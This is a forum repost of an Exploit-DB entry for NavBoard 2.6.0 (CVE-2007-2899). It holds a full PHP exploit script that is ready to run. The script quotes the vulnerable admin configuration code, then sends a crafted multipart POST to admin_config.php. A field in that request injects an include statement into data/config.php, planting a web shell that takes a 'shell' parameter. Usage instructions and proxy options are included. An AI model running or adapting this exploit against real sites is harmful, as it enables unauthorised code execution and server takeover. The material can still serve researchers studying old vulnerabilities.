Exploit NavBoard 2.6.0 - Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3971
Проверка EDB
  1. Пройдено
Автор
DJ7XPL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-2899
Дата публикации
2007-05-23
PHP:
<?php

/*
        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   [email protected]   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal        :   NavBoard 2.6.0
[!] Download      :   http://www.sourceforge.net/projects/navboard
[!] Type          :   Remote Code Execution Exploit

---------------------------------------------------------------------
*/

/*
Vuln Code :

[Code]

if(!$editconfig){

 tableheader1();
 print "<form action=\"admin_config.php\" method=post>";
 print "<input type=hidden name=\"editconfig\" value=\"1\" size=40>"; 
 print "<tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Main forum settings</b>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Board Title";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"boardtitle\" value=\"$configarray[0]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Admin email address (blank will not display)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"adminemail\" value=\"$configarray[35]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Main website address (NOT forum address, blank will display forum address)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"mainwebsite\" value=\"$configarray[36]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Display text title instead of graphic logo for faster loading<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[34]=="on")
 {print "<input type=checkbox name=\"textlogo\" class=\"forminput\" checked>";}
 else{print "<input type=checkbox name=\"textlogo\" class=\"forminput\">";}
 print "</span></td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 
 print "<b>Forums</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max levels of subforums to display on one page (less will make for faster loading)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxsubforumdisplay\" value=\"$configarray[27]\" size=2 class=\"forminput\">";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Don't find forum reply count on the fly, recount during posting<br>(faster forum page, may slow posting slightly)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[42]=="on"){
 print "<input type=checkbox name=\"dontscanreplycount\" class=\"forminput\" checked>";
 }else{print "<input type=checkbox name=\"dontscanreplycount\" class=\"forminput\">";}
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Forum/Thread indenting amount<br>Percentage of title cell used for indent spaing";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"indentspacing\" value=\"$configarray[44]\" size=2 class=\"forminput\">%";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 
 print "<b>Posts</b><br>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Seconds before user may add another post (flood control)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"postfloodcontrolsec\" value=\"$configarray[37]\" size=2 class=\"forminput\">";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Amount of nested bbcodes allowed<br>(how many times a bbcode tag can be put over itself) 3 is default";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"nestedbbcodes\" value=\"$configarray[43]\" size=2 class=\"forminput\">";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Show names for user levels instead of imageicons:<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[45]=="on"){
 print "<input type=checkbox name=\"userlevelnames\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"userlevelnames\" class=\"forminput\">";
 }
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Show all edits instead of only last edit on posts<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[46]=="on"){
 print "<input type=checkbox name=\"showalledits\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"showalledits\" class=\"forminput\">";
 }
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 
 print "<b>Registration</b><br>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Seconds before another account can be registered (flood control)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"regfloodcontrolsec\" value=\"$configarray[38]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Method of registration<br>";
 print "NOTE: Mailing in php must be setup correctly on your server to work with email confirmation";
 print "</span></td><td class=\"tablecell2\" width=\"50%\"><span class=\"textlarge\">";
 if($configarray[39]=="on"||$configarray[39]==""){
 print "<input type=radio name=\"registration\" value=\"on\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"registration\" value=\"on\" class=\"forminput\"> ";
 }
 print "Allowed<br>";
 if($configarray[39]=="confirm"){
 print "<input type=radio name=\"registration\" value=\"confirm\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"registration\" value=\"confirm\" class=\"forminput\"> ";
 }
 print "Email confirmed<br>";
 if($configarray[39]=="approve"){
 print "<input type=radio name=\"registration\" value=\"approve\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"registration\" value=\"approve\" class=\"forminput\"> ";
 }
 print "Admin approved";
 print "</span></td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Profiles</b>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Allow duplicate display names<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[32]=="on"){
 print "<input type=checkbox name=\"allowdupdisplay\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"allowdupdisplay\" class=\"forminput\">";
 }
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Display name changing<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\"><span class=\"textlarge\">";
 if($configarray[41]=="off"){
 print "<input type=radio name=\"displaychange\" value=\"off\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"displaychange\" value=\"off\" class=\"forminput\"> ";
 }
 print "Not allowed<br>";
 if($configarray[41]=="on"||$configarray[41]==""){
 print "<input type=radio name=\"displaychange\" value=\"on\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"displaychange\" value=\"on\" class=\"forminput\"> ";
 }
 print "Allowed<br>";
 if($configarray[41]=="approve"){
 print "<input type=radio name=\"displaychange\" value=\"approve\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"displaychange\" value=\"approve\" class=\"forminput\"> ";
 }
 print "Admin approved";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Default time format (php <a href=\"http://www.php.net/manual/en/function.date.php\" target=\"_new\">date</a> format) ";
 print "Recommended: n-j-Y h:iA <br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"defaulttime\" value=\"$configarray[33]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max people on individual users buddy lists";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"buddylistmax\" value=\"$configarray[28]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Avatars</b><br>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Avatar file size limit (bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"avatarfilesize\" value=\"$configarray[9]\" size=20 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Avatar dimensions limit (height)x(width)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"avatardimension\" value=\"$configarray[10]\" size=20 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Attachments</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Allowed attachment extensions (separated by commas) (blank would allow no attachments)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"allowedattachext\" value=\"$configarray[22]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max size of attachments (in bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxattachsize\" value=\"$configarray[23]\" size=20 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total size of all attachments (in bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxtotalattachsize\" value=\"$configarray[31]\" size=20 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Polls</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max poll options<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxpolloptions\" value=\"$configarray[24]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Theme</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Default theme<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 $themesarray=listdirs("themes");
 print "<select size=1 name=\"defaulttheme\" size=40 class=\"forminput\">\n";
 for($n=0;$n<count($themesarray);$n++){

  if($themesarray[$n]==$configarray[12]){
  print "<option value=\"$themesarray[$n]\" selected>$themesarray[$n]</option>";
  }else{
  print "<option value=\"$themesarray[$n]\">$themesarray[$n]</option>";
  }

 }
 print "</select>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Online users</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Seconds of inactivity before user is removed from online list (300seconds=5minutes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"inactivityseconds\" value=\"$configarray[13]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Page settings</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Threads to show per page in forum<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"threadperpage\" value=\"$configarray[7]\" size=2 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Posts to show per page in thread<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"postperpage\" value=\"$configarray[8]\" size=2 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Max character settings</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total characters in body of posts<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxcharsbody\" value=\"$configarray[18]\" size=5 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total characters in subject of posts<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxcharssubject\" value=\"$configarray[25]\" size=5 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total characters in signatures<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxcharssigs\" value=\"$configarray[19]\" size=5 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Enabling/Disabling</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Allow HTML in posts:<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[14]=="allowhtml"){
 print "<input type=checkbox name=\"html\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"html\" class=\"forminput\">";
 }
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Enable GZ Compression:<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[21]=="disablegz"){
 print "<input type=checkbox name=\"gzcompress\" class=\"forminput\">";
 }else{
 print "<input type=checkbox name=\"gzcompress\" class=\"forminput\" checked>";
 } 
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Private Messaging</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total size of pms per user (bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxpmsize\" value=\"$configarray[29]\" size=10 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total number of pms per user<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxpmnumber\" value=\"$configarray[30]\" size=10 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Board Closing</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Entering info here will cause the entire bulletin board to be closed<br>";
 print "This is the message that shows up when the board is closed<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"boardclosing\" value=\"$configarray[40]\" size=60 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell2\" colspan=\"2\"><span class=\"textlarge\">";
 print "<input type=submit name=\"submit\" value=\"Update\" class=\"formbutton\">";
 print "</span>";
 print "</td>";
 print "</form>";
 print "</tr>";
 print "</table>";
 }

 if($editconfig){

 $boardtitle=stripslashes($boardtitle);
 $boardtitle=htmlentities($boardtitle);
 writedata("$maindatadir/config.php",$boardtitle,0);
 writedata("$maindatadir/config.php",$threadperpage,7);
 writedata("$maindatadir/config.php",$postperpage,8);
 writedata("$maindatadir/config.php",$avatarfilesize,9);
 writedata("$maindatadir/config.php",$avatardimension,10);
 writedata("$maindatadir/config.php",$defaulttheme,12);
 writedata("$maindatadir/config.php",$inactivityseconds,13);
 if($html=="on"){
 writedata("$maindatadir/config.php","allowhtml",14);
 }else{
 writedata("$maindatadir/config.php","denyhtml",14);
 }
 writedata("$maindatadir/config.php",$maxcharsbody,18);
 writedata("$maindatadir/config.php",$maxcharssigs,19);
 if($gzcompress=="on"){
 writedata("$maindatadir/config.php","enablegz",21);
 }else{
 writedata("$maindatadir/config.php","disablegz",21);
 }
 writedata("$maindatadir/config.php",$allowedattachext,22);
 writedata("$maindatadir/config.php",$maxattachsize,23);
 writedata("$maindatadir/config.php",$maxpolloptions,24);
 writedata("$maindatadir/config.php",$maxcharssubject,25);
 writedata("$maindatadir/config.php",$maxsubforumdisplay,27);
 writedata("$maindatadir/config.php",$buddylistmax,28);
 writedata("$maindatadir/config.php",$maxpmsize,29);
 writedata("$maindatadir/config.php",$maxpmnumber,30);
 writedata("$maindatadir/config.php",$maxtotalattachsize,31);
 writedata("$maindatadir/config.php",$allowdupdisplay,32);
 writedata("$maindatadir/config.php",$defaulttime,33);
 writedata("$maindatadir/config.php",$textlogo,34);
 writedata("$maindatadir/config.php",$adminemail,35);
 writedata("$maindatadir/config.php",$mainwebsite,36);
 writedata("$maindatadir/config.php",$postfloodcontrolsec,37);
 writedata("$maindatadir/config.php",$regfloodcontrolsec,38);
 writedata("$maindatadir/config.php",$registration,39);
 writedata("$maindatadir/config.php",$boardclosing,40);
 writedata("$maindatadir/config.php",$displaychange,41);
 
 if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if turning on for first time, make a recount
  for($n=0;$n<count($forumarray);$n++){
  $topicarray=listdirs("$configarray[2]/$forumarray[$n]");
  $replies=0;
   for($m=0;$m<count($topicarray);$m++){
    $postarray2=listfiles("$configarray[2]/$forumarray[$n]/$topicarray[$m]");
    $replies+=count($postarray2)-1;
   }
  writedata("$configarray[2]/$forumarray[$n].php",$replies,11);
  }
 writedata("$maindatadir/config.php",$dontscanreplycount,42);
 }else{
 writedata("$maindatadir/config.php",$dontscanreplycount,42);
 }
 
 writedata("$maindatadir/config.php",$nestedbbcodes,43);
 writedata("$maindatadir/config.php",$indentspacing,44);
 writedata("$maindatadir/config.php",$userlevelnames,45);
 writedata("$maindatadir/config.php",$showalledits,46);
*/

if ($argc<2) {
print_r('
-----------------------------------------------------------------------------

Usage: php '.$argv[0].' Host Path Options
host: Target server (ip/hostname)
path: Path To Folder

Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy

Example:
php '.$argv[0].' 127.0.0.1 /Forum/ -P1.1.1.1:80

-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

/*Data*/

$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="editconfig"


-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardtitle"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="threadperpage"

www\";include \"\$shell\";\/\/
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postperpage"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatarfilesize"

11
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatardimension"

123
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttheme"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="inactivityseconds"

#CCFF00
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="html"

on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharsbody"

111
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssigs"

11122
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="gzcompress"

on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowedattachext"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxattachsize"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpolloptions"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssubject"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxsubforumdisplay"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="buddylistmax"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmsize"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmnumber"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxtotalattachsize"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowdupdisplay"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttime"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="textlogo"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="adminemail"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="mainwebsite"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postfloodcontrolsec"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="regfloodcontrolsec"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="registration"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardclosing"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="displaychange"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="replies"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="dontscanreplycount"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="nestedbbcodes"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="indentspacing"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="userlevelnames"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="showalledits"

red
-----------------------------7d6224c08dc
';


/*Echo Header*/
echo "[!] NavBoard 2.6.0\r\n";
echo "[!] Powered By Y! Underground Group\r\n";
echo "[!] Vuln And Coded By Dj7xpl\r\n";

/*Sending Data*/
$packet ="POST ".$path."admin_config.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
sleep(2);
Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n";

?>

# milw0rm.com [2007-05-23][/CODE]
 
Источник
www.exploit-db.com

Похожие темы